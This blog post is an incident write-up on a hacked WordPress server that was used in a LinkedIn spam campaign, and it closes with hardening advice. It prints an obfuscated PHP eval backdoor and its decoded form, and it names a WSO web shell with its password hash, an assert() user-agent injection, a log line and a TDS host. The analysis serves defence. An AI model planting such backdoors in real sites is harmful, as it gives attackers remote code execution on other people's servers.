Cleaning up a hacked WordPress

April 23, 2013 by Asbra — Leave a comment

Recently I received a few spam emails in the “LinkedIn” campaign and analyzed them.

Here is an example:
LinkedIn Spam Campaign

The links in the email all lead to the same place:
http:// a hacked website /wp-content/plugins/akicmet/wp-status.php?HEQMB3HVL5URH

I informed a few of the domain holders about the breach and was able to gain access to one server, to help the guy out. Unfortunently I was not able to retrieve a sample of the wp-status.php before the client deleted it. However I found other things on the server.

Analyzing the access & error logs it’s apparent that someone is and has been bruteforcing his WordPress installations, perhaps as part of the WordPress bruteforce attack reported on by Brian Krebs. The clients webhost has mod_rbl installed which has helped a bit, but not enough.
However this does not seem to be related to the current intrusion.

in /wp-content/ there has been added a .php file

<?php //cb6f82f3e4007bdaccf419abafab94c8
$_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
//system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));

Which decodes to

<?php
if(isset($_POST["code"]))
{
eval(base64_decode($_POST["code"]));
}

This is a basic PHP command dropper that an attacked can utilize to run commands on the server remotely, inject more files, etc. There is no type of “security” on his script, meaning anyone that knows that it’s supposed to use the POST-variable “code” can run commands on the server.

Looking further the /wp-content/plugins/hello.php has been replaced with WSO 404 shell. Here is his shell password if anyone is interested:

$auth_pass = "db45017826a631e563871485b70ed782";

And there’s another injection in a few WordPress core files
wordpress assert injection

PHP function assert runs PHP code similar to eval() and the attacker uses user agent to deliver the command, instead of for example GET or POST.

The server has been used for mailing further in the spam-campaign, and was still mailing when I gained access to the server. As soon as I removed the conf.php file, the mailing stopped.

Analyzing the access logs I found this:

XX.XX.38.113 - - [22/Apr/2013:09:58:54 -0600] "GET /wp-content/plugins/akicmet/wp-status.php?mode=config&key=gfinberw8gjyu9djru47slbn47quf8oytuh7gdrs HTTP/1.1" 200 520 "http:// domain censored /wp-content/plugins/akismet/wp-status.php?mode=config&key=gfinberw8gjyu9djru47slbn47quf8oytuh7gdrs" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24"

The key is the same for all of these and the path to wp-status.php is usually akismet or akicmet. There you can see the domain for his TDS is currently http://sydinex.net/TDS.post.php with IP 94.250.251.43

In conclusion

Easy to clean up, but the damage is already done, his server has been used in spam-campaigns for a long time by now (intrusion seems to have been on March 17th)

Protecting your WordPress

WordFenceI recommended the client to install Wordfence Security plugin for WordPress. The free version is enough to give you a decent block from bruteforce (with a bit of tweaking), alerts when files change (important) and basic “hiding” options such as removing WordPress meta tags.

However it does not find everything that I would like it to, so I usually use it in conjunction with Exploit Scanner plugin, which checks for common strings that certainly give false-positives but sometimes are worth checking in on.

Asbra

Posts Facebook

Blogging out of many years of experience with gamehacking, programming, reverse-engineering and general tomfoolery.

No Comments

Be the first to start the conversation.

Leave a Reply